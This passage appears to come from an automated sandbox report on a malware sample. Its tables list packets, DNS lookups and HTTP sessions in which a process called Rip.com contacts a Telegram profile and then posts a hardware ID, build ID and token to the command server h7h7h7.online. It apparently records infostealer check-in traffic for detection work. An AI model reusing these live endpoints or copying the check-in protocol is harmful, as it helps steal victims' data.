                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:53.556154013 CET44349825116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.208852053 CET44349825116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.208913088 CET44349825116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.208939075 CET49825443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.208971024 CET44349825116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.208981991 CET49825443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.209007978 CET49825443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.209083080 CET44349825116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.209136963 CET49825443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.209275961 CET49825443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.209290981 CET44349825116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.211594105 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.211627007 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.211694956 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.211918116 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.211931944 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.884705067 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.884812117 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.885241032 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.885250092 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.887130022 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:54.887135983 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.581877947 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.581933022 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.581948042 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.581964970 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.581975937 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.582016945 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.582024097 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.582065105 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.582103968 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.582151890 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.582262039 CET49826443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.582271099 CET44349826116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.596471071 CET49827443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.596518040 CET44349827116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.596612930 CET49827443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.596785069 CET49827443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:55.596798897 CET44349827116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.281111002 CET44349827116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.281267881 CET49827443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.281759977 CET49827443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.281774998 CET44349827116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.283773899 CET49827443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.283781052 CET44349827116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.938702106 CET44349827116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.938791990 CET49827443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.938817024 CET44349827116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.938857079 CET49827443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.938875914 CET44349827116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.938921928 CET49827443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.988079071 CET49827443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:56.988115072 CET44349827116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:59.717834949 CET44349824116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:59.717899084 CET49824443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:59.717916012 CET44349824116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:59.717957973 CET49824443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:59.717982054 CET44349824116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:59.718045950 CET49824443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:59.720654964 CET49824443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:59.720664024 CET44349824116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:00.724442005 CET49839443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:00.724463940 CET44349839116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:00.725033045 CET49839443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:00.725187063 CET49839443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:00.725198984 CET44349839116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:01.367068052 CET44349839116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:01.367141008 CET49839443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:01.367446899 CET49839443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:01.367451906 CET44349839116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:01.369371891 CET49839443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:01.369375944 CET44349839116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.057723045 CET44349839116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.057781935 CET44349839116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.057787895 CET49839443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.057818890 CET49839443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.057939053 CET49839443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.057945013 CET44349839116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.058914900 CET49846443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.058934927 CET44349846116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.059003115 CET49846443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.059159994 CET49846443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.059170008 CET44349846116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.728292942 CET44349846116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.728379011 CET49846443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.728720903 CET49846443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.728728056 CET44349846116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.730597019 CET49846443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:02.730602980 CET44349846116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:03.404313087 CET44349846116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:03.404382944 CET44349846116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:03.404400110 CET49846443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:03.404433966 CET49846443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:03.404652119 CET49846443192.168.2.4116.203.13.109
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:03.404659986 CET44349846116.203.13.109192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:11.016181946 CET4972480192.168.2.4199.232.210.172
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:11.021205902 CET8049724199.232.210.172192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:34:11.021274090 CET4972480192.168.2.4199.232.210.172

                                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:06.808909893 CET5593753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:06.817447901 CET53559371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:20.197412968 CET5093753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:20.204277992 CET53509371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:21.347882986 CET6208253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:21.360078096 CET53620821.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:22.591041088 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:32.140458107 CET53513431.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:32.158035040 CET53556401.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:32.428426027 CET5180653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:32.428662062 CET5693553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:32.435106039 CET53518061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:32.435579062 CET53569351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:33.187994957 CET53587681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:34.290069103 CET53523421.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.096923113 CET5355278162.159.36.2192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.612900019 CET5301653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.619702101 CET53530161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.896842003 CET4954753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.896996975 CET6038253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.903342009 CET53495471.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.904141903 CET53603821.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.911302090 CET53615261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:36.913408995 CET5427853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:36.913582087 CET5726953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:36.920016050 CET53542781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:36.920283079 CET53572691.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:37.428809881 CET5873953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:37.436041117 CET53587391.1.1.1192.168.2.4

                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:06.808909893 CET192.168.2.41.1.1.10xe5b8Standard query (0)uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRmA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:20.197412968 CET192.168.2.41.1.1.10xdc3eStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:21.347882986 CET192.168.2.41.1.1.10xbd9fStandard query (0)h7h7h7.onlineA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:32.428426027 CET192.168.2.41.1.1.10xd6bbStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:32.428662062 CET192.168.2.41.1.1.10x51c5Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.612900019 CET192.168.2.41.1.1.10x9430Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.896842003 CET192.168.2.41.1.1.10x4a7aStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.896996975 CET192.168.2.41.1.1.10x6853Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:36.913408995 CET192.168.2.41.1.1.10x4d79Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:36.913582087 CET192.168.2.41.1.1.10x7e11Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:37.428809881 CET192.168.2.41.1.1.10x4022Standard query (0)56.163.245.4.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:06.817447901 CET1.1.1.1192.168.2.40xe5b8Name error (3)uVsReHLpkvXMkPFzJmRm.uVsReHLpkvXMkPFzJmRmnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:20.204277992 CET1.1.1.1192.168.2.40xdc3eNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:21.360078096 CET1.1.1.1192.168.2.40xbd9fNo error (0)h7h7h7.online116.203.13.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:32.435106039 CET1.1.1.1192.168.2.40xd6bbNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:32.435579062 CET1.1.1.1192.168.2.40x51c5No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.619702101 CET1.1.1.1192.168.2.40x9430Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.903342009 CET1.1.1.1192.168.2.40x4a7aNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.903342009 CET1.1.1.1192.168.2.40x4a7aNo error (0)plus.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:35.904141903 CET1.1.1.1192.168.2.40x6853No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:36.920016050 CET1.1.1.1192.168.2.40x4d79No error (0)play.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                      Dec 31, 2024 21:33:37.436041117 CET1.1.1.1192.168.2.40x4022Name error (3)56.163.245.4.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                      • t.me
                                                                                                                                                                                                                                                                      • h7h7h7.online
                                                                                                                                                                                                                                                                      • www.google.com
                                                                                                                                                                                                                                                                      • apis.google.com
                                                                                                                                                                                                                                                                      • play.google.com

                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      0192.168.2.449735149.154.167.994437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:21 UTC85OUTGET /w211et HTTP/1.1
                                                                                                                                                                                                                                                                      Host: t.me
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:21 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:21 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                      Content-Length: 12308
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Set-Cookie: stel_ssid=bb36389a1a8d554313_12468366739647930728; expires=Wed, 01 Jan 2025 20:33:21 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                                      2024-12-31 20:33:21 UTC12308INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 77 32 31 31 65 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @w211et</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      1192.168.2.449737116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:22 UTC186OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:22 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:22 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      2192.168.2.449739116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:23 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----euk6p89zcba1n7ymycb1
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 256
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:23 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 65 75 6b 36 70 38 39 7a 63 62 61 31 6e 37 79 6d 79 63 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 42 36 39 31 46 32 46 43 45 42 34 33 37 35 30 37 37 33 35 36 34 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 65 75 6b 36 70 38 39 7a 63 62 61 31 6e 37 79 6d 79 63 62 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 65 75 6b 36 70 38 39 7a 63 62 61 31 6e 37 79 6d 79 63 62 31 2d 2d 0d
                                                                                                                                                                                                                                                                      Data Ascii: ------euk6p89zcba1n7ymycb1Content-Disposition: form-data; name="hwid"DB691F2FCEB43750773564-a33c7340-61ca------euk6p89zcba1n7ymycb1Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------euk6p89zcba1n7ymycb1--
                                                                                                                                                                                                                                                                      2024-12-31 20:33:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:24 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      2024-12-31 20:33:24 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                      Data Ascii: 3a1|1|1|1|bc82680b0936218a60ff647f0b9c85db|1|0|1|1|0|50000|10


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      3192.168.2.449740116.203.13.1094437816C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-12-31 20:33:24 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----jm7qq1nycbim7q1dtjwb
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                      Host: h7h7h7.online
                                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                      2024-12-31 20:33:24 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 6a 6d 37 71 71 31 6e 79 63 62 69 6d 37 71 31 64 74 6a 77 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 63 38 32 36 38 30 62 30 39 33 36 32 31 38 61 36 30 66 66 36 34 37 66 30 62 39 63 38 35 64 62 0d 0a 2d 2d 2d 2d 2d 2d 6a 6d 37 71 71 31 6e 79 63 62 69 6d 37 71 31 64 74 6a 77 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 6a 6d 37 71 71 31 6e 79 63 62 69 6d 37 71 31 64 74 6a 77 62 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                      Data Ascii: ------jm7qq1nycbim7q1dtjwbContent-Disposition: form-data; name="token"bc82680b0936218a60ff647f0b9c85db------jm7qq1nycbim7q1dtjwbContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------jm7qq1nycbim7q1dtjwbCont
                                                                                                                                                                                                                                                                      2024-12-31 20:33:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                      Date: Tue, 31 Dec 2024 20:33:25 GMT
                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
